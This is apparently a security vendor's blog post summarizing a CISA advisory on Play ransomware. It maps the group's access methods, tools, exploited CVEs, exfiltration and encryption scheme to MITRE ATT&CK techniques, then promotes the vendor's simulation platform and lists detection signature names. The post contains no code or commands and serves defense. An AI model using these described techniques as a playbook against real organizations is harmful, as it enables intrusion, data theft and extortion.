Play Ransomware Analysis, Simulation and Mitigation- CISA Alert AA23-352A

The Blue Report 2024

Get a comprehensive analysis of over 136 million cyber attacks and understand the state of threat exposure management.

DOWNLOAD

On December 18, 2023, The Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on Play ransomware [1]. Play ransomware group first appeared in June 2022, and the group has compromised nearly 300 organizations worldwide. Play ransomware operators exploit known vulnerabilities and follow recent ransomware trends like double extortion and inhibiting system recovery. 

In this blog post, we explained the Tactics, Techniques, and Procedures (TTPs) used by Play ransomware and how organizations can defend themselves against Play ransomware attacks.

Play Ransomware

Play ransomware, also known as PlayCrypt, was first observed in late June 2022. The group targets organizations located in Australia, Latin America, Europe, and the United States. As a financially motivated threat group, victims of Play ransomware are from various industries, such as education, healthcare, insurance, media, technology, and telecommunications. 

As an initial access vector, the group uses known vulnerabilities in public-facing assets and compromised valid accounts. For reconnaissance, defense evasion, and persistence in the victim's network, the ransomware threat actors use custom and open-source tools such as AdFind, BloodHound, Cobalt Strike, GMER, Mimikatz, and WinPEAS. Play ransomware follows ransomware trends and employs tactics similar to those of other recent ransomware groups like Hive and Nokoyawa. The ransomware payload uses an intermittent encryption scheme based on the size of the file, encrypting chunks of 0x100000 bytes. In addition to file encryption, Play ransomware operators steal their victims' sensitive data and threaten to publish it on their "leak site" if the ransom isn't paid. 

Although it is a relatively new player in the ransomware scene, the Play ransomware group still poses a threat to organizations. In their advisory, CISA recommends organizations continuously validate their security controls against the Play ransomware variants and their evolving tools and techniques.

Play Ransomware Analysis and MITRE ATT&CK TTPs

Initial Access

T1078 Valid Accounts

Play ransomware operators use compromised valid accounts to gain initial access to the target network. Illegally obtained credentials and reusing passwords across multiple platforms are likely causes of account compromise.

T1133 External Remote Services

Play ransomware threat actors use publicly exposed RDP and VPN servers to establish a foothold in the target system. Compromised valid accounts are also used to gain access via RDP and VPN services.

T1190 Exploit Public Facing Application

Play ransomware exploits critical vulnerabilities in public-facing assets for initial access. They are known to exploit OWASSRF, ProxyNotShell, FortiOS CVE-2018-13379 and CVE-2020-12812 vulnerabilities. 

Discovery

T1016 System Network Configuration Discovery & T1518.001 Software Discovery: Security Software Discovery

After gaining initial access, adversaries use AdFind to enumerate the victim's Active Directory. Additionally, they use an info-stealer and network scanner malware named Grixba to enumerate users and computers in the domain. Grixba's scan mode utilizes WMI, WinRM, and Remote Registry to determine software runs on network devices. The malware can also scan for antivirus, EDR suites, and backup tools.

Defense Evasion

T1562.001 Impair Defenses: Disable or Modify Tools

Play ransomware actors disable the identified security software in the victim's environment using legitimate tools like GMER, IOBit, and PowerTool.

T1070.001 Indicator Removal: Clear Windows Event Logs

Play ransomware actors delete Windows Event logs to hide their tracks and prevent defenders from investigating the ransomware incident.

Credential Access

T1552 Unsecured Credentials

Adversaries search for unsecured credentials to elevate their privileges or move laterally in the compromised network.

T1003 OS Credential Dumping 

Play ransomware threat actors use Mimikatz to dump credentials and view Kerberos tickets. Moreover, they use Mimikatz to add accounts to domain controllers and gain domain administrative access.

Lateral Movement

T1570 Lateral Tool Transfer 

Play ransomware group brings tools like Cobalt Strike, SystemBC, and PsExec to help their lateral movement and file exfiltration efforts.

Collection

T1560.001 Archive Collected Data: Archive via Utility

Prior to data exfiltration, adversaries compress their victims' files using WinRAR and split data into segments.

Exfiltration

T1048 Exfiltration Over Alternative Protocol

WinSCP is a free and open-source tool that facilitates secure file transfer between a local and a remote computer, typically using Secure Shell (SSH) protocols, including both Secure Copy Protocol (SCP) and Secure File Transfer Protocol (SFTP). Adversaries use WinSCP to exfiltrate the victim's data to adversary-controlled services.

Impact

T1486 Data Encrypted for Impact

Play ransomware uses the generic RSA-AES hybrid cryptosystem to encrypt files. Encrypted files are appended with a .play extension. 

The payload follows an intermittent encryption scheme based on the file size, encrypting chunks of 0x100000 bytes. If the file size is smaller than 1 gigabyte, the ransomware only encrypts two chunks. If the file size is smaller than 10 gigabytes, the ransomware only encrypts three chunks. If the file size is larger than 10 gigabytes, the ransomware encrypts five chunks.

play-ransomware

Figure 1: Example of a null file encrypted with Play ransomware [2]

How Picus Helps Simulate Play Ransomware Attacks?

We also strongly suggest simulating Play ransomware attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Complete Security Validation Platform. You can also test your defenses against hundreds of other ransomware variants, such as AvosLocker, MedusaLocker, and Akira, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Play ransomware

Threat ID

Threat Name

Attack Module

95549

Play Ransomware Campaign 2022

Windows Endpoint

28161

Play Ransomware Download Threat

Network Infiltration

38463

Play Ransomware Email Threat

Email Infiltration (Phishing)

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address Play ransomware and other ransomware attacks in preventive security controls. Currently, Picus Labs validated the following signatures for Play ransomware:

Security Control

Signature ID

Signature Name

Check Point NGFW

0C7AB166B

Trojan.Win32.HEUR:Trojan-Ransom.TC.78a9Srdg

Cisco FirePower

 

W32.Auto:762bb8.in03.Talos

Forcepoint NGFW

 

File_Malware-Blocked 

Fortigate AV

10106192

W32/Filecoder.PLAY!tr.ransom

McAfee

0x4840c900 

MALWARE: Malicious File Detected by GTI

Palo Alto

584061252

Ransom/Win32.play.n


Start simulating emerging threats today and get actionable mitigation insights with a  14-day free trialof Picus Complete Security Validation Platform.

References

[1] "#StopRansomware: Play Ransomware," Cybersecurity and Infrastructure Security Agency CISA. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-352a. [Accessed: Dec. 19, 2023]

[2] A. Milenkoski, "Crimeware Trends," SentinelOne, Sep. 08, 2022. Available: https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/. [Accessed: Dec. 19, 2023]